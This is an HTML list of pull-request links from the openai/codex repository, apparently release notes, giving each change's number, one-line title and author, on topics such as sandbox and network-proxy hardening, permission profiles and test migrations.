<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337920830" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19846" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19846/hovercard" href="https://github.com/openai/codex/pull/19846">#19846</a> [sandbox] Enforce protected workspace metadata paths <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evawong-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evawong-oai">@evawong-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344353929" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20005" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20005/hovercard" href="https://github.com/openai/codex/pull/20005">#20005</a> feat: house-keeping memories 3 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340713130" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19929" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19929/hovercard" href="https://github.com/openai/codex/pull/19929">#19929</a> TUI: use cumulative turn duration for worked-for separator <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332888788" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19753" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19753/hovercard" href="https://github.com/openai/codex/pull/19753">#19753</a> Terminate stdio MCP servers on shutdown to avoid process leaks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326441505" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19473" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19473/hovercard" href="https://github.com/openai/codex/pull/19473">#19473</a> Add turn start timestamp to turn metadata <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mchen-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mchen-oai">@mchen-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338725536" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19875" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19875/hovercard" href="https://github.com/openai/codex/pull/19875">#19875</a> Strip connector provenance metadata from custom MCP tools <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colby-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colby-oai">@colby-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333072247" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19764" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19764/hovercard" href="https://github.com/openai/codex/pull/19764">#19764</a> feat: verify agent identity JWTs with JWKS <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efrazer-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efrazer-oai">@efrazer-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337921990" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19847" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19847/hovercard" href="https://github.com/openai/codex/pull/19847">#19847</a> Enforce workspace metadata protections in Seatbelt <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evawong-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evawong-oai">@evawong-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327242970" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19509" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19509/hovercard" href="https://github.com/openai/codex/pull/19509">#19509</a> Record MCP result telemetry on mcp.tools.call spans <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mchen-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mchen-oai">@mchen-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340010456" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19907" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19907/hovercard" href="https://github.com/openai/codex/pull/19907">#19907</a> Clarify network approval auto-review prompts <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maja-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maja-openai">@maja-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339770449" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19901" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19901/hovercard" href="https://github.com/openai/codex/pull/19901">#19901</a> feat(tui): suggest plan mode from composer drafts <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcoury-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcoury-oai">@fcoury-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340811843" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19931" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19931/hovercard" href="https://github.com/openai/codex/pull/19931">#19931</a> Move local /resume cwd filtering into thread/list <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748114" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19986" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19986/hovercard" href="https://github.com/openai/codex/pull/19986">#19986</a> fix(tui): let esc exit empty shell mode <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcoury-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcoury-oai">@fcoury-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339662355" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19895" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19895/hovercard" href="https://github.com/openai/codex/pull/19895">#19895</a> External agent session support <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stefanstokic-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stefanstokic-oai">@stefanstokic-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344226188" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20002" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20002/hovercard" href="https://github.com/openai/codex/pull/20002">#20002</a> fix(network-proxy): tighten network proxy bypass defaults <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339748404" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19900" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19900/hovercard" href="https://github.com/openai/codex/pull/19900">#19900</a> permissions: add built-in default profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345179405" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20045" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20045/hovercard" href="https://github.com/openai/codex/pull/20045">#20045</a> Fix plan mode nudge test after task completion signature change <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325325934" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19432" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19432/hovercard" href="https://github.com/openai/codex/pull/19432">#19432</a> [codex] Add token usage to turn tracing spans <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/charley-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/charley-openai">@charley-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344212558" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20001" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20001/hovercard" href="https://github.com/openai/codex/pull/20001">#20001</a> fix(network-proxy): harden linux proxy bridge helpers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342284030" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19959" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19959/hovercard" href="https://github.com/openai/codex/pull/19959">#19959</a> Fix log db batch flush flake <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylan-hurd-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylan-hurd-oai">@dylan-hurd-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241817714" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/17373" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/17373/hovercard" href="https://github.com/openai/codex/pull/17373">#17373</a> app-server: run initialized rpcs with keyed serialization <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/euroelessar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/euroelessar">@euroelessar</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331914948" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19708" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19708/hovercard" href="https://github.com/openai/codex/pull/19708">#19708</a> Load cloud requirements for agent identity <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shijie-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shijie-oai">@shijie-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344193667" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19999" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19999/hovercard" href="https://github.com/openai/codex/pull/19999">#19999</a> fix(network-proxy): recheck network proxy connect targets <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345233828" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20047" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20047/hovercard" href="https://github.com/openai/codex/pull/20047">#20047</a> app-server: allow remote_control runtime feature override <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/euroelessar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/euroelessar">@euroelessar</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345291655" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20052" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20052/hovercard" href="https://github.com/openai/codex/pull/20052">#20052</a> Make MultiAgentV2 wait minimum configurable <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344454834" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20008" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20008/hovercard" href="https://github.com/openai/codex/pull/20008">#20008</a> tui: use permission profiles for sandbox state <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345635921" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20068" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20068/hovercard" href="https://github.com/openai/codex/pull/20068">#20068</a> app-server: disable remote control without sqlite <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/euroelessar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/euroelessar">@euroelessar</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345541712" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20066" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20066/hovercard" href="https://github.com/openai/codex/pull/20066">#20066</a> [rollout-trace] Include x-request-id in rollout trace. <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassirer-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassirer-openai">@cassirer-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331872937" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19705" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19705/hovercard" href="https://github.com/openai/codex/pull/19705">#19705</a> Discover hooks bundled with plugins <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinav-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinav-oai">@abhinav-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297539287" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18704" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18704/hovercard" href="https://github.com/openai/codex/pull/18704">#18704</a> /plugins: add marketplace install flow <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346333994" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20085" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20085/hovercard" href="https://github.com/openai/codex/pull/20085">#20085</a> fix: don't auto approve git -C ... <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/owenlin0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/owenlin0">@owenlin0</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346559190" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20088" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20088/hovercard" href="https://github.com/openai/codex/pull/20088">#20088</a> Fix flaky plugin hook env test <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinav-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinav-oai">@abhinav-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344063790" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19995" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19995/hovercard" href="https://github.com/openai/codex/pull/19995">#19995</a> fix(network-proxy): normalize network proxy host matching <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344514118" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20010" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20010/hovercard" href="https://github.com/openai/codex/pull/20010">#20010</a> core tests: submit turns with permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346660658" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20092" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20092/hovercard" href="https://github.com/openai/codex/pull/20092">#20092</a> Return None when auth refresh fails <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gpeal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gpeal">@gpeal</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340384727" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19919" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19919/hovercard" href="https://github.com/openai/codex/pull/19919">#19919</a> app-server: notify clients of remote-control status changes <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/euroelessar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/euroelessar">@euroelessar</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346813102" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20097" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20097/hovercard" href="https://github.com/openai/codex/pull/20097">#20097</a> Refine Codex issue digest summaries <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344569787" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20011" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20011/hovercard" href="https://github.com/openai/codex/pull/20011">#20011</a> core tests: build user turns from permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344641614" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20013" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20013/hovercard" href="https://github.com/openai/codex/pull/20013">#20013</a> core tests: migrate more turns to permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344660369" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20015" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20015/hovercard" href="https://github.com/openai/codex/pull/20015">#20015</a> core tests: configure profiles directly <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344699490" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20016" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20016/hovercard" href="https://github.com/openai/codex/pull/20016">#20016</a> core tests: send model turns with permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346904186" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20100" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20100/hovercard" href="https://github.com/openai/codex/pull/20100">#20100</a> Increase plugin hook env test timeout <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinav-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinav-oai">@abhinav-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344761438" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20018" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20018/hovercard" href="https://github.com/openai/codex/pull/20018">#20018</a> core tests: migrate model/personality turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344804222" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20021" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20021/hovercard" href="https://github.com/openai/codex/pull/20021">#20021</a> core tests: migrate view image turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344848381" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20024" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20024/hovercard" href="https://github.com/openai/codex/pull/20024">#20024</a> core tests: migrate safety check turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344859584" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20026" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20026/hovercard" href="https://github.com/openai/codex/pull/20026">#20026</a> core tests: migrate plan item turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344934616" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20027" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20027/hovercard" href="https://github.com/openai/codex/pull/20027">#20027</a> core tests: migrate tools tests to permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344944287" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20028" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20028/hovercard" href="https://github.com/openai/codex/pull/20028">#20028</a> core tests: migrate permissions message tests to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344949022" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20030" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20030/hovercard" href="https://github.com/openai/codex/pull/20030">#20030</a> core tests: migrate exec policy turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344975755" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20032" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20032/hovercard" href="https://github.com/openai/codex/pull/20032">#20032</a> core tests: migrate prompt caching turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344985245" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20033" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20033/hovercard" href="https://github.com/openai/codex/pull/20033">#20033</a> core tests: migrate request permissions tool turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345022481" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20034" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20034/hovercard" href="https://github.com/openai/codex/pull/20034">#20034</a> core tests: migrate zsh-fork permissions to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345036326" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20035" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20035/hovercard" href="https://github.com/openai/codex/pull/20035">#20035</a> core tests: migrate compact turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345051660" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20037" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20037/hovercard" href="https://github.com/openai/codex/pull/20037">#20037</a> core tests: migrate rmcp turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345072543" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20040" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20040/hovercard" href="https://github.com/openai/codex/pull/20040">#20040</a> core tests: migrate apply patch turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345086218" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20041" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20041/hovercard" href="https://github.com/openai/codex/pull/20041">#20041</a> core tests: migrate hook turns to profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
